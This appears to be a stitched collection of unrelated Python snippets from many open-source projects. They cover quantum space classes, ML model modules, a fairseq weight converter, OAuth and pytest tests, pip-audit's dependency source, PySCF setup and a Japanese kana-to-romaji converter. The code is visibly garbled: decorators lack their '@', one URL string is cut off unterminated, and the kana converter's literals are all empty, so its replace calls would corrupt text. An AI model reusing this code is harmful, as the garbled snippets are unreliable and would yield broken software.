def __init__(self, dims):
idims = int(dims)
if ((idims <= 0) or (idims != dims)):
raise ValueError('Dimensions must be integers > 0')
self.size = dims
self.issuper = False
self.superrep = None
self._pure_dims = True
self.__setitem__ = _frozen
def __eq__(self, other):
return ((self is other) or ((type(other) is type(self)) and (other.size == self.size)))
def __hash__(self):
return hash(self.size)
def __repr__(self):
return f'Space({self.size})'
def as_list(self):
return [self.size]
def __str__(self):
return str(self.as_list())
def dims2idx(self, dims):
return dims
def idx2dims(self, idx):
return [idx]
def step(self):
return [1]
def flat(self):
return [self.size]
def remove(self, idx):
raise RuntimeError('Cannot delete a flat space.')
def replace(self, idx, new):
if (idx != 0):
raise ValueError('Cannot replace a non-zero index in a flat space.')
return Space(new)
def replace_superrep(self, super_rep):
return self |
def test_fileinrewriterstep_in_and_out_with_formatting():
context = Context({'k1': 'v1', 'root': {'in': 'inpath{k1}here', 'out': 'outpath{k1}here'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert (obj.path_in == 'inpathv1here')
assert (obj.path_out == 'outpathv1here')
assert (obj.context == context)
assert (obj.logger.name == 'blah.name') |
class Response_Aggregator(nn.Module):
def __init__(self, num_class, W=256, input_class=None):
super(Response_Aggregator, self).__init__()
self.num_class = num_class
self.W = W
if (input_class is not None):
self.input_linear = nn.Sequential(fc_block(input_class, W), fc_block(W, (W // 2)))
else:
self.input_linear = nn.Sequential(fc_block(num_class, W), fc_block(W, (W // 2)))
self.output_linear = nn.Linear((W // 2), num_class)
def forward(self, x):
h = self.input_linear(x)
seg_logits = self.output_linear(h)
return seg_logits |
class MathUtilsTestCase(TestCase):
def test_number_of_decimal_places(self):
self.assertEqual(number_of_decimal_places(1), 0)
self.assertEqual(number_of_decimal_places(3.14), 2)
self.assertEqual(number_of_decimal_places('3.14'), 2)
self.assertEqual(number_of_decimal_places((- 3.14)), 2) |
def recursively_load_weights(fairseq_model, hf_model, is_headless):
unused_weights = []
fairseq_dict = fairseq_model.state_dict()
feature_extractor = hf_model.wav2vec2_conformer.feature_extractor
for (name, value) in fairseq_dict.items():
is_used = False
if ('conv_layers' in name):
load_conv_layer(name, value, feature_extractor, unused_weights, (hf_model.config.feat_extract_norm == 'group'))
is_used = True
else:
for (key, mapped_key) in MAPPING.items():
mapped_key = (('wav2vec2_conformer.' + mapped_key) if (mapped_key not in TOP_LEVEL_KEYS) else mapped_key)
if ((key in name) or (key.split('w2v_model.')[(- 1)] == name.split('.')[0])):
is_used = True
if ('*' in mapped_key):
layer_index = name.split(key)[0].split('.')[(- 2)]
mapped_key = mapped_key.replace('*', layer_index)
if ('pos_bias_u' in name):
weight_type = None
elif ('pos_bias_v' in name):
weight_type = None
elif ('weight_g' in name):
weight_type = 'weight_g'
elif ('weight_v' in name):
weight_type = 'weight_v'
elif ('bias' in name):
weight_type = 'bias'
elif ('weight' in name):
weight_type = 'weight'
elif ('running_mean' in name):
weight_type = 'running_mean'
elif ('inv_freq' in name):
weight_type = 'inv_freq'
elif ('running_var' in name):
weight_type = 'running_var'
elif ('num_batches_tracked' in name):
weight_type = 'num_batches_tracked'
else:
weight_type = None
set_recursively(hf_model, mapped_key, value, name, weight_type)
continue
if (not is_used):
unused_weights.append(name)
logger.warning(f'Unused weights: {unused_weights}') |
class LongitudinalDistanceAction(_PrivateActionType):
def __init__(self, entity, freespace=True, continuous=True, max_acceleration=None, max_deceleration=None, max_speed=None, distance=None, timeGap=None, coordinate_system=CoordinateSystem.entity, displacement=LongitudinalDisplacement.any):
self.target = entity
self.freespace = convert_bool(freespace)
self.continuous = convert_bool(continuous)
self.dynamic_constraint = DynamicsConstraints(max_acceleration, max_deceleration, max_speed)
if ((distance is not None) and (timeGap is not None)):
raise ToManyOptionalArguments('Not both of distance and timeGap can be used.')
if ((distance is None) and (timeGap is None)):
raise NotEnoughInputArguments('Either ds or dsLane is needed as input.')
self.distance = convert_float(distance)
self.timeGap = convert_float(timeGap)
self.coordinate_system = convert_enum(coordinate_system, CoordinateSystem)
self.displacement = convert_enum(displacement, LongitudinalDisplacement)
def __eq__(self, other):
if isinstance(other, LongitudinalDistanceAction):
if ((self.get_attributes() == other.get_attributes()) and (self.dynamic_constraint == other.dynamic_constraint)):
return True
return False
def parse(element):
lda_element = element.find('LongitudinalAction/LongitudinalDistanceAction')
entity = lda_element.attrib['entityRef']
freespace = convert_bool(lda_element.attrib['freespace'])
continuous = convert_bool(lda_element.attrib['continuous'])
distance = None
timeGap = None
if ('distance' in lda_element.attrib):
distance = convert_float(lda_element.attrib['distance'])
if ('timeGap' in lda_element.attrib):
timeGap = convert_float(lda_element.attrib['timeGap'])
coordinate_system = CoordinateSystem.entity
if ('coordinateSystem' in lda_element.attrib):
coordinate_system = convert_enum(lda_element.attrib['coordinateSystem'], CoordinateSystem, False)
displacement = LongitudinalDisplacement.any
if ('displacement' in lda_element.attrib):
displacement = convert_enum(lda_element.attrib['displacement'], LongitudinalDisplacement, False)
max_acceleration = None
max_deceleration = None
max_speed = None
constraints = None
if (lda_element.find('DynamicConstraints') != None):
constraints = DynamicsConstraints.parse(lda_element.find('DynamicConstraints'))
max_acceleration = constraints.max_acceleration
max_deceleration = constraints.max_deceleration
max_speed = constraints.max_speed
return LongitudinalDistanceAction(entity, freespace, continuous, max_acceleration, max_deceleration, max_speed, distance, timeGap, coordinate_system, displacement)
def get_attributes(self):
retdict = {}
retdict['entityRef'] = self.target
retdict['freespace'] = get_bool_string(self.freespace)
retdict['continuous'] = get_bool_string(self.continuous)
if (self.distance != None):
retdict['distance'] = str(self.distance)
if (self.timeGap != None):
retdict['timeGap'] = str(self.timeGap)
if (not self.isVersion(minor=0)):
retdict['coordinateSystem'] = self.coordinate_system.get_name()
retdict['displacement'] = self.displacement.get_name()
return retdict
def get_element(self):
element = ET.Element('PrivateAction')
longact = ET.SubElement(element, 'LongitudinalAction')
longdistaction = ET.SubElement(longact, 'LongitudinalDistanceAction', attrib=self.get_attributes())
if self.dynamic_constraint.is_filled():
longdistaction.append(self.dynamic_constraint.get_element())
return element |
class InstagramOAuth2Test(OAuth2Test):
backend_path = 'social_core.backends.instagram.InstagramOAuth2'
user_data_url = '
expected_username = 'foobar'
access_token_body = json.dumps({'access_token': 'foobar', 'token_type': 'bearer', 'meta': {'code': 200}, 'user': {'username': 'foobar', 'id': ''}})
user_data_body = json.dumps({'meta': {'code': 200}, 'username': 'foobar', 'id': ''})
def test_login(self):
self.do_login()
def test_partial_pipeline(self):
self.do_partial_pipeline() |
def test_IterativeImputer_params_vs_sklearn():
from sklearn.experimental import enable_iterative_imputer
result = sorted(impute.IterativeImputer._skcriteria_parameters)
ignore = ['add_indicator', 'skip_complete']
alias = {'n_nearest_features': 'n_nearest_criteria', 'keep_empty_features': 'keep_empty_criteria'}
expected = sorted([alias.get(p, p) for p in sklimpute.IterativeImputer().get_params(deep=False) if (p not in ignore)])
assert (result == expected) |
.parametrize('order', [20, 25, 30])
.parametrize('alpha', [0.0, 0.35, 0.5])
.parametrize('stage', [1, 2, 3, 4, 5, 6])
def test_mglsadf(order, alpha, stage):
delay = pysptk.mglsadf_delay(order, stage)
__test_filt_base(pysptk.mglsadf, order, delay, alpha, stage)
__test_filt_base(pysptk.mglsadft, order, delay, alpha, stage) |
def get_tiny_config(config_class, model_class=None, **model_tester_kwargs):
model_type = config_class.model_type
config_source_file = inspect.getsourcefile(config_class)
modeling_name = config_source_file.split(os.path.sep)[(- 1)].replace('configuration_', '').replace('.py', '')
try:
print('Importing', model_type_to_module_name(model_type))
module_name = model_type_to_module_name(model_type)
if (not modeling_name.startswith(module_name)):
raise ValueError(f"{modeling_name} doesn't start with {module_name}!")
test_file = os.path.join('tests', 'models', module_name, f'test_modeling_{modeling_name}.py')
models_to_model_testers = get_model_to_tester_mapping(test_file)
model_tester_class = None
tester_classes = []
if (model_class is not None):
tester_classes = get_tester_classes_for_model(test_file, model_class)
else:
for _tester_classes in models_to_model_testers.values():
tester_classes.extend(_tester_classes)
if (len(tester_classes) > 0):
model_tester_class = sorted(tester_classes, key=(lambda x: x.__name__))[0]
except ModuleNotFoundError:
error = f'Tiny config not created for {model_type} - cannot find the testing module from the model name.'
raise ValueError(error)
if (model_tester_class is None):
error = f'Tiny config not created for {model_type} - no model tester is found in the testing module.'
raise ValueError(error)
model_tester = model_tester_class(parent=None, **model_tester_kwargs)
if hasattr(model_tester, 'get_pipeline_config'):
return model_tester.get_pipeline_config()
elif hasattr(model_tester, 'prepare_config_and_inputs'):
return model_tester.prepare_config_and_inputs()[0]
elif hasattr(model_tester, 'get_config'):
return model_tester.get_config()
else:
error = f'Tiny config not created for {model_type} - the model tester {model_tester_class.__name__} lacks necessary method to create config.'
raise ValueError(error) |
class Division(BinaryOperator):
def __init__(self, left, right):
super().__init__('/', left, right)
def _diff(self, variable):
(top, bottom) = self.orphans
return (((top.diff(variable) * bottom) - (top * bottom.diff(variable))) / (bottom ** 2))
def _binary_jac(self, left_jac, right_jac):
(left, right) = self.orphans
if left.evaluates_to_constant_number():
return (((- left) / (right ** 2)) * right_jac)
else:
return (((right * left_jac) - (left * right_jac)) / (right ** 2))
def _binary_evaluate(self, left, right):
if issparse(left):
return csr_matrix(left.multiply((1 / right)))
else:
return (left / right) |
def compile_forward_sampling_function(outputs: List[Variable], vars_in_trace: List[Variable], basic_rvs: Optional[List[Variable]]=None, givens_dict: Optional[Dict[(Variable, Any)]]=None, constant_data: Optional[Dict[(str, np.ndarray)]]=None, constant_coords: Optional[Set[str]]=None, **kwargs) -> Tuple[(Callable[(..., Union[(np.ndarray, List[np.ndarray])])], Set[Variable])]:
if (givens_dict is None):
givens_dict = {}
if (basic_rvs is None):
basic_rvs = []
if (constant_data is None):
constant_data = {}
if (constant_coords is None):
constant_coords = set()
def shared_value_matches(var):
try:
old_array_value = constant_data[var.name]
except KeyError:
return (var.name in constant_coords)
current_shared_value = var.get_value(borrow=True)
return np.array_equal(old_array_value, current_shared_value)
fg = FunctionGraph(outputs=outputs, clone=False)
nodes: List[Variable] = general_toposort(fg.outputs, deps=(lambda x: (x.owner.inputs if x.owner else [])))
volatile_nodes: Set[Any] = set()
for node in nodes:
if ((node in fg.outputs) or (node in givens_dict) or (isinstance(node, SharedVariable) and (not isinstance(node, (RandomStateSharedVariable, RandomGeneratorSharedVariable))) and (not shared_value_matches(node))) or ((node in basic_rvs) and (node not in vars_in_trace)) or (node.owner and any(((inp in volatile_nodes) for inp in node.owner.inputs)))):
volatile_nodes.add(node)
inputs = []
def expand(node):
if ((((node.owner is None) and (not isinstance(node, (Constant, SharedVariable)))) or (node in vars_in_trace)) and (node not in volatile_nodes)):
inputs.append(node)
if node.owner:
return node.owner.inputs
list(walk(fg.outputs, expand))
givens = [(node, (value if isinstance(value, (Variable, Apply)) else pt.constant(value, dtype=getattr(node, 'dtype', None), name=node.name))) for (node, value) in givens_dict.items()]
return (compile_pymc(inputs, fg.outputs, givens=givens, on_unused_input='ignore', **kwargs), (set(basic_rvs) & (volatile_nodes - set(givens_dict)))) |
class PipSource(DependencySource):
def __init__(self, *, local: bool=False, paths: Sequence[Path]=[], skip_editable: bool=False, state: AuditState=AuditState()) -> None:
self._local = local
self._paths = paths
self._skip_editable = skip_editable
self.state = state
effective_python = os.environ.get('PIPAPI_PYTHON_LOCATION', sys.executable)
venv_prefix = os.getenv('VIRTUAL_ENV')
if ((venv_prefix is not None) and (not effective_python.startswith(venv_prefix))):
logger.warning(f"pip-audit will run pip against {effective_python}, but you have a virtual environment loaded at {venv_prefix}. This may result in unintuitive audits, since your local environment will not be audited. You can forcefully override this behavior by setting PIPAPI_PYTHON_LOCATION to the location of your virtual environment's Python interpreter.")
if (_PIP_VERSION < _MINIMUM_RELIABLE_PIP_VERSION):
logger.warning(f'pip {_PIP_VERSION} is very old, and may not provide reliable dependency information! You are STRONGLY encouraged to upgrade to a newer version of pip.')
def collect(self) -> Iterator[Dependency]:
try:
for (_, dist) in pip_api.installed_distributions(local=self._local, paths=list(self._paths)).items():
dep: Dependency
if (dist.editable and self._skip_editable):
dep = SkippedDependency(name=dist.name, skip_reason='distribution marked as editable')
else:
try:
dep = ResolvedDependency(name=dist.name, version=Version(str(dist.version)))
self.state.update_state(f'Collecting {dep.name} ({dep.version})')
except InvalidVersion:
skip_reason = f'Package has invalid version and could not be audited: {dist.name} ({dist.version})'
logger.debug(skip_reason)
dep = SkippedDependency(name=dist.name, skip_reason=skip_reason)
(yield dep)
except Exception as e:
raise PipSourceError('failed to list installed distributions') from e
def fix(self, fix_version: ResolvedFixVersion) -> None:
self.state.update_state(f'Fixing {fix_version.dep.name} ({fix_version.dep.version} => {fix_version.version})')
fix_cmd = [sys.executable, '-m', 'pip', 'install', f'{fix_version.dep.canonical_name}=={fix_version.version}']
try:
subprocess.run(fix_cmd, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except subprocess.CalledProcessError as cpe:
raise PipFixError(f'failed to upgrade dependency {fix_version.dep.name} to fix version {fix_version.version}') from cpe |
class IE9(Library):
def __init__(self):
super().__init__('IE9')
self.shipped_in_package = 'reahl.web.static'
self.files = ['IE9.js']
def footer_only_material(self, rendered_page):
result = '\n<!--[if lte IE 9]>'
result += super().footer_only_material(rendered_page)
result += '<![endif]-->'
return result |
class TestIOPath(unittest.TestCase):
def test_no_iopath(self):
from .test_reproducibility import TestReproducibility
with mock.patch.dict('sys.modules', {'iopath': None}):
TestReproducibility._test_reproducibility(self, 'test_reproducibility')
def test_no_supports_rename(self):
from .test_reproducibility import TestReproducibility
with mock.patch('fairseq.file_io.PathManager.supports_rename') as mock_fn:
mock_fn.return_value = False
TestReproducibility._test_reproducibility(self, 'test_reproducibility') |
class ResNetV1(HybridBlock):
def __init__(self, block, layers, channels, classes=1000, thumbnail=False, last_gamma=False, norm_layer=BatchNorm, norm_kwargs=None, **kwargs):
super(ResNetV1, self).__init__()
assert ('fw' in kwargs.keys()), 'no_fw'
self.fw = kwargs['fw']
assert (len(layers) == (len(channels) - 1))
with self.name_scope():
self.features = nn.HybridSequential(prefix='')
if thumbnail:
self.features.add(_conv3x3(channels[0], 1, 0))
else:
self.features.add(nn.Conv2D(channels[0], 7, 2, 3, use_bias=False))
self.features.add(norm_layer(**({} if (norm_kwargs is None) else norm_kwargs)))
self.features.add(nn.Activation('relu'))
self.features.add(nn.MaxPool2D(3, 2, 1))
for (i, num_layer) in enumerate(layers):
stride = (1 if (i == 0) else 2)
self.features.add(self._make_layer(block, num_layer, channels[(i + 1)], stride, (i + 1), in_channels=channels[i], last_gamma=last_gamma, norm_layer=norm_layer, norm_kwargs=norm_kwargs))
self.features.add(nn.GlobalAvgPool2D())
self.fc2 = nn.Dense(classes, in_units=channels[(- 1)], use_bias=False)
self.fc3 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
self.fc4 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
self.fc5 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
self.fc6 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
self.fc7 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
self.fc8 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
self.fc9 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
self.fc10 = nn.Dense(5, in_units=channels[(- 1)], use_bias=False)
def _make_layer(self, block, layers, channels, stride, stage_index, in_channels=0, last_gamma=False, norm_layer=BatchNorm, norm_kwargs=None):
layer = nn.HybridSequential(prefix=('stage%d_' % stage_index))
with layer.name_scope():
layer.add(block(channels, stride, (channels != in_channels), in_channels=in_channels, last_gamma=last_gamma, prefix='', norm_layer=norm_layer, norm_kwargs=norm_kwargs))
for _ in range((layers - 1)):
layer.add(block(channels, 1, False, in_channels=channels, last_gamma=last_gamma, prefix='', norm_layer=norm_layer, norm_kwargs=norm_kwargs))
return layer
def hybrid_forward(self, F, x, num=0, fix_cnn=False):
if fix_cnn:
with ag.pause():
x = self.features[:7](x)
x = self.features[7][0](x)
x = self.features[7][1](x)
x = self.features[8:](x)
out = F.L2Normalization(x)
feat = out
else:
x = self.features(x)
out = F.L2Normalization(x)
feat = out
if self.fw:
for i in range((num + 1)):
if (i < num):
with ag.pause():
fc = eval(('self.fc' + str((i + 2))))
if (i == 0):
output = fc(out)
else:
output = mx.nd.concat(output, fc(out), dim=1)
else:
fc = eval(('self.fc' + str((i + 2))))
if (i == 0):
output = fc(out)
else:
output = mx.nd.concat(output, fc(out), dim=1)
return (feat, output)
else:
for i in range((num + 1)):
fc = eval(('self.fc' + str((i + 2))))
if (i == 0):
output = fc(out)
else:
output = mx.nd.concat(output, fc(out), dim=1)
return (feat, output) |
class SFT_Net(nn.Module):
def __init__(self):
super(SFT_Net, self).__init__()
self.conv0 = nn.Conv2d(3, 64, 3, 1, 1)
sft_branch = []
for i in range(16):
sft_branch.append(ResBlock_SFT())
sft_branch.append(SFTLayer())
sft_branch.append(nn.Conv2d(64, 64, 3, 1, 1))
self.sft_branch = nn.Sequential(*sft_branch)
self.HR_branch = nn.Sequential(nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(2), nn.ReLU(True), nn.Conv2d(64, 256, 3, 1, 1), nn.PixelShuffle(2), nn.ReLU(True), nn.Conv2d(64, 64, 3, 1, 1), nn.ReLU(True), nn.Conv2d(64, 3, 3, 1, 1))
self.CondNet = nn.Sequential(nn.Conv2d(8, 128, 4, 4), nn.LeakyReLU(0.1, True), nn.Conv2d(128, 128, 1), nn.LeakyReLU(0.1, True), nn.Conv2d(128, 128, 1), nn.LeakyReLU(0.1, True), nn.Conv2d(128, 128, 1), nn.LeakyReLU(0.1, True), nn.Conv2d(128, 32, 1))
def forward(self, x):
cond = self.CondNet(x[1])
fea = self.conv0(x[0])
res = self.sft_branch((fea, cond))
fea = (fea + res)
out = self.HR_branch(fea)
return out |
def format_func(fn: FuncIR, errors: Sequence[tuple[(ErrorSource, str)]]=()) -> list[str]:
lines = []
cls_prefix = ((fn.class_name + '.') if fn.class_name else '')
lines.append('def {}{}({}):'.format(cls_prefix, fn.name, ', '.join((arg.name for arg in fn.args))))
names = generate_names_for_ir(fn.arg_regs, fn.blocks)
for line in format_registers(fn, names):
lines.append((' ' + line))
source_to_error = defaultdict(list)
for (source, error) in errors:
source_to_error[source].append(error)
code = format_blocks(fn.blocks, names, source_to_error)
lines.extend(code)
return lines |
class AM2RGameExportDialog(GameExportDialog, Ui_AM2RGameExportDialog):
def game_enum(cls):
return RandovaniaGame.AM2R
def __init__(self, options: Options, patch_data: dict, word_hash: str, spoiler: bool, games: list[RandovaniaGame]):
super().__init__(options, patch_data, word_hash, spoiler, games)
per_game = options.options_for_game(self.game_enum())
assert isinstance(per_game, AM2RPerGameOptions)
self.input_file_button.clicked.connect(self._on_input_file_button)
self.output_file_button.clicked.connect(self._on_output_file_button)
if (per_game.input_path is not None):
self.input_file_edit.setText(str(per_game.input_path))
if (per_game.output_path is not None):
self.output_file_edit.setText(str(per_game.output_path))
add_field_validation(accept_button=self.accept_button, fields={self.input_file_edit: (lambda : (not (self.input_file.is_dir() and _is_valid_input_dir(self.input_file)))), self.output_file_edit: (lambda : (not (self.output_file.is_dir() and (self.output_file != self.input_file))))})
def input_file(self) -> Path:
return Path(self.input_file_edit.text())
def output_file(self) -> Path:
return Path(self.output_file_edit.text())
def auto_save_spoiler(self) -> bool:
return self.auto_save_spoiler_check.isChecked()
def _on_input_file_button(self):
input_dir = prompt_for_input_directory(self, self.input_file_edit)
if (input_dir is not None):
self.input_file_edit.setText(str(input_dir.absolute()))
def _on_output_file_button(self):
output_dir = prompt_for_output_directory(self, 'AM2R Randomizer', self.output_file_edit)
if (output_dir is not None):
self.output_file_edit.setText(str(output_dir))
def update_per_game_options(self, per_game: AM2RPerGameOptions) -> AM2RPerGameOptions:
return dataclasses.replace(per_game, input_path=self.input_file, output_path=self.output_file)
def get_game_export_params(self) -> AM2RGameExportParams:
spoiler_output = spoiler_path_for_directory(self.auto_save_spoiler, self.output_file)
return AM2RGameExportParams(spoiler_output=spoiler_output, input_path=self.input_file, output_path=self.output_file) |
def setUpModule():
global cell, kmf, kpts, nkpts
cell = gto.Cell()
cell.atom = '\n H 0.0 0.0 0.0\n F 0.9 0.0 0.0\n '
cell.basis = 'sto-3g'
cell.a = [[2.82, 0, 0], [0, 2.82, 0], [0, 0, 2.82]]
cell.dimension = 1
cell.output = '/dev/null'
cell.build()
nk = [2, 1, 1]
kpts = cell.make_kpts(nk)
nkpts = len(kpts)
kmf = scf.KRHF(cell, kpts=kpts, exxdiv=None).density_fit()
kmf.kernel() |
def maybe_create_ambiguous_expander(tree_class, expansion, keep_all_tokens):
to_expand = [i for (i, sym) in enumerate(expansion) if (keep_all_tokens or ((not (sym.is_term and sym.filter_out)) and _should_expand(sym)))]
if to_expand:
return partial(AmbiguousExpander, to_expand, tree_class) |
def test_arrange_horizontal_with_gap(view, settings):
settings.setValue('Items/arrange_gap', 6)
item1 = BeePixmapItem(QtGui.QImage())
view.scene.addItem(item1)
item1.setSelected(True)
item1.setPos(10, (- 100))
item2 = BeePixmapItem(QtGui.QImage())
view.scene.addItem(item2)
item2.setSelected(True)
item2.setPos((- 10), 40)
view.scene.cancel_crop_mode = MagicMock()
with patch.object(item1, 'bounding_rect_unselected', return_value=QtCore.QRectF(0, 0, 100, 80)):
with patch.object(item2, 'bounding_rect_unselected', return_value=QtCore.QRectF(0, 0, 100, 80)):
view.scene.arrange()
assert (item2.pos() == QtCore.QPointF((- 50), (- 30)))
assert (item1.pos() == QtCore.QPointF(56, (- 30)))
view.scene.cancel_crop_mode.assert_called_once_with() |
class MyDataset(torch.utils.data.Dataset):
def __init__(self):
super().__init__()
self.length = 100
def __getitem__(self, idx):
assert ((idx >= 0) and (idx < self.length)), 'Provided index {} must be in range [0, {}).'.format(idx, self.length)
return torch.rand(3, 100, 100)
def __len__(self):
return self.length |
def set(name, data=None, dbHandle=None):
if (dbHandle is None):
dbHandle = ops.db.Database(db=ops.db.TARGET_DB, isolation_level=None)
with dbHandle as db:
curs = ensureMarkerTable(db)
curs.execute('SELECT name, last_date, extra FROM marker WHERE name = :name', (name,))
if curs.fetchone():
curs.execute('UPDATE marker SET last_date = :date WHERE name = :name', (datetime.datetime.now(), name))
if (data != None):
('UPDATE marker SET extra = :data WHERE name = :name', (data, name))
else:
if (data == None):
data = ''
curs.execute('INSERT INTO marker (name, last_date, extra) VALUES (:name, :now, :data)', (name, datetime.datetime.now(), data)) |
class ConvolutionalEncoder(nn.Module):
def __init__(self, n_features_input, num_hidden_features, kernel_size, padding, n_resblocks, dropout_min=0, dropout_max=0.2, blockObject=ResidualBlock, batchNormObject=nn.BatchNorm2d):
super(ConvolutionalEncoder, self).__init__()
self.n_features_input = n_features_input
self.num_hidden_features = num_hidden_features
self.stages = nn.ModuleList()
dropout = [(((1 - t) * dropout_min) + (t * dropout_max)) for t in np.linspace(0, 1, len(num_hidden_features))]
block = [nn.Conv2d(n_features_input, num_hidden_features[0], kernel_size=kernel_size, stride=1, padding=padding)]
for _ in range(n_resblocks):
p = next(iter(dropout))
block += [blockObject(num_hidden_features[0], kernel_size, padding, dropout=p, batchNormObject=batchNormObject)]
self.stages.append(nn.Sequential(*block))
for (features_in, features_out) in [num_hidden_features[i:(i + 2)] for i in range(0, len(num_hidden_features), 1)][:(- 1)]:
block = [nn.MaxPool2d(2), nn.Conv2d(features_in, features_out, kernel_size=1, padding=0), batchNormObject(features_out), nn.ReLU()]
p = next(iter(dropout))
for _ in range(n_resblocks):
block += [blockObject(features_out, kernel_size, padding, dropout=p, batchNormObject=batchNormObject)]
self.stages.append(nn.Sequential(*block))
def forward(self, x):
skips = []
for stage in self.stages:
x = stage(x)
skips.append(x)
return (x, skips)
def getInputShape(self):
return ((- 1), self.n_features_input, (- 1), (- 1))
def getOutputShape(self):
return ((- 1), self.num_hidden_features[(- 1)], (- 1), (- 1)) |
_config
def test_matrix_simple(manager):
manager.test_window('one')
assert (manager.c.layout.info()['rows'] == [['one']])
manager.test_window('two')
assert (manager.c.layout.info()['rows'] == [['one', 'two']])
manager.test_window('three')
assert (manager.c.layout.info()['rows'] == [['one', 'two'], ['three']]) |
def get_configs_from_multiple_files():
train_config = train_pb2.TrainConfig()
with tf.gfile.GFile(FLAGS.train_config_path, 'r') as f:
text_format.Merge(f.read(), train_config)
model_config = model_pb2.DetectionModel()
with tf.gfile.GFile(FLAGS.model_config_path, 'r') as f:
text_format.Merge(f.read(), model_config)
input_config = input_reader_pb2.InputReader()
with tf.gfile.GFile(FLAGS.input_config_path, 'r') as f:
text_format.Merge(f.read(), input_config)
return (model_config, train_config, input_config) |
def kana2alphabet(text):
text = text.replace('', 'kya').replace('', 'kyu').replace('', 'kyo')
text = text.replace('', 'gya').replace('', 'gyu').replace('', 'gyo')
text = text.replace('', 'sha').replace('', 'shu').replace('', 'sho')
text = text.replace('', 'ja').replace('', 'ju').replace('', 'jo')
text = text.replace('', 'cha').replace('', 'chu').replace('', 'cho')
text = text.replace('', 'nya').replace('', 'nyu').replace('', 'nyo')
text = text.replace('', 'fa').replace('', 'fi').replace('', 'fe')
text = text.replace('', 'fo')
text = text.replace('', 'hya').replace('', 'hyu').replace('', 'hyo')
text = text.replace('', 'mya').replace('', 'myu').replace('', 'myo')
text = text.replace('', 'rya').replace('', 'ryu').replace('', 'ryo')
text = text.replace('', 'bya').replace('', 'byu').replace('', 'byo')
text = text.replace('', 'pya').replace('', 'pyu').replace('', 'pyo')
text = text.replace('', 'ga').replace('', 'gi').replace('', 'gu')
text = text.replace('', 'ge').replace('', 'go').replace('', 'za')
text = text.replace('', 'ji').replace('', 'zu').replace('', 'ze')
text = text.replace('', 'zo').replace('', 'da').replace('', 'ji')
text = text.replace('', 'zu').replace('', 'de').replace('', 'do')
text = text.replace('', 'ba').replace('', 'bi').replace('', 'bu')
text = text.replace('', 'be').replace('', 'bo').replace('', 'pa')
text = text.replace('', 'pi').replace('', 'pu').replace('', 'pe')
text = text.replace('', 'po')
text = text.replace('', 'ka').replace('', 'ki').replace('', 'ku')
text = text.replace('', 'ke').replace('', 'ko').replace('', 'sa')
text = text.replace('', 'shi').replace('', 'su').replace('', 'se')
text = text.replace('', 'so').replace('', 'ta').replace('', 'chi')
text = text.replace('', 'tsu').replace('', 'te').replace('', 'to')
text = text.replace('', 'na').replace('', 'ni').replace('', 'nu')
text = text.replace('', 'ne').replace('', 'no').replace('', 'ha')
text = text.replace('', 'hi').replace('', 'fu').replace('', 'he')
text = text.replace('', 'ho').replace('', 'ma').replace('', 'mi')
text = text.replace('', 'mu').replace('', 'me').replace('', 'mo')
text = text.replace('', 'ra').replace('', 'ri').replace('', 'ru')
text = text.replace('', 're').replace('', 'ro')
text = text.replace('', 'ya').replace('', 'yu').replace('', 'yo')
text = text.replace('', 'wa').replace('', 'wi').replace('', 'wo')
text = text.replace('', 'we')
text = _convert(text, KANA2HEP)
while ('' in text):
text = list(text)
tsu_pos = text.index('')
if (len(text) <= (tsu_pos + 1)):
return (''.join(text[:(- 1)]) + 'xtsu')
if (tsu_pos == 0):
text[tsu_pos] = 'xtsu'
else:
text[tsu_pos] = text[(tsu_pos + 1)]
text = ''.join(text)
return text |
def pytest_addoption(parser):
group = parser.getgroup('timeout', 'Interrupt test run and dump stacks of all threads after a test times out')
group.addoption('--timeout', type=float, help=TIMEOUT_DESC)
group.addoption('--timeout_method', action='store', choices=['signal', 'thread'], help='Deprecated, use --timeout-method')
group.addoption('--timeout-method', dest='timeout_method', action='store', choices=['signal', 'thread'], help=METHOD_DESC)
group.addoption('--timeout-disable-debugger-detection', dest='timeout_disable_debugger_detection', action='store_true', help=DISABLE_DEBUGGER_DETECTION_DESC)
parser.addini('timeout', TIMEOUT_DESC)
parser.addini('timeout_method', METHOD_DESC)
parser.addini('timeout_func_only', FUNC_ONLY_DESC, type='bool', default=False)
parser.addini('timeout_disable_debugger_detection', DISABLE_DEBUGGER_DETECTION_DESC, type='bool', default=False) |
def test_show_different_scopes(pytester: Pytester, mode) -> None:
p = pytester.makepyfile('\n import pytest\n \n def arg_function():\n """function scoped fixture"""\n (scope=\'session\')\n def arg_session():\n """session scoped fixture"""\n def test_arg1(arg_session, arg_function):\n pass\n ')
result = pytester.runpytest(mode, p)
assert (result.ret == 0)
result.stdout.fnmatch_lines(['SETUP S arg_session*', '*SETUP F arg_function*', '*test_arg1 (fixtures used: arg_function, arg_session)*', '*TEARDOWN F arg_function*', 'TEARDOWN S arg_session*']) |
.skipif((K.backend() != 'tensorflow'), reason='Requires TF backend')
_test
def test_model_with_input_feed_tensor():
import tensorflow as tf
input_a_np = np.random.random((10, 3))
input_b_np = np.random.random((10, 3))
output_a_np = np.random.random((10, 4))
output_b_np = np.random.random((10, 3))
a = Input(tensor=tf.Variable(input_a_np, dtype=tf.float32))
b = Input(shape=(3,), name='input_b')
a_2 = Dense(4, name='dense_1')(a)
dp = Dropout(0.5, name='dropout')
b_2 = dp(b)
model = Model([a, b], [a_2, b_2])
model.summary()
optimizer = 'rmsprop'
loss = 'mse'
loss_weights = [1.0, 0.5]
model.compile(optimizer, loss, metrics=['mean_squared_error'], loss_weights=loss_weights, sample_weight_mode=None)
out = model.train_on_batch(input_b_np, [output_a_np, output_b_np])
out = model.train_on_batch({'input_b': input_b_np}, [output_a_np, output_b_np])
out = model.test_on_batch({'input_b': input_b_np}, [output_a_np, output_b_np])
out = model.predict_on_batch({'input_b': input_b_np})
out = model.fit({'input_b': input_b_np}, [output_a_np, output_b_np], epochs=1, batch_size=10)
out = model.fit(input_b_np, [output_a_np, output_b_np], epochs=1, batch_size=10)
out = model.evaluate({'input_b': input_b_np}, [output_a_np, output_b_np], batch_size=10)
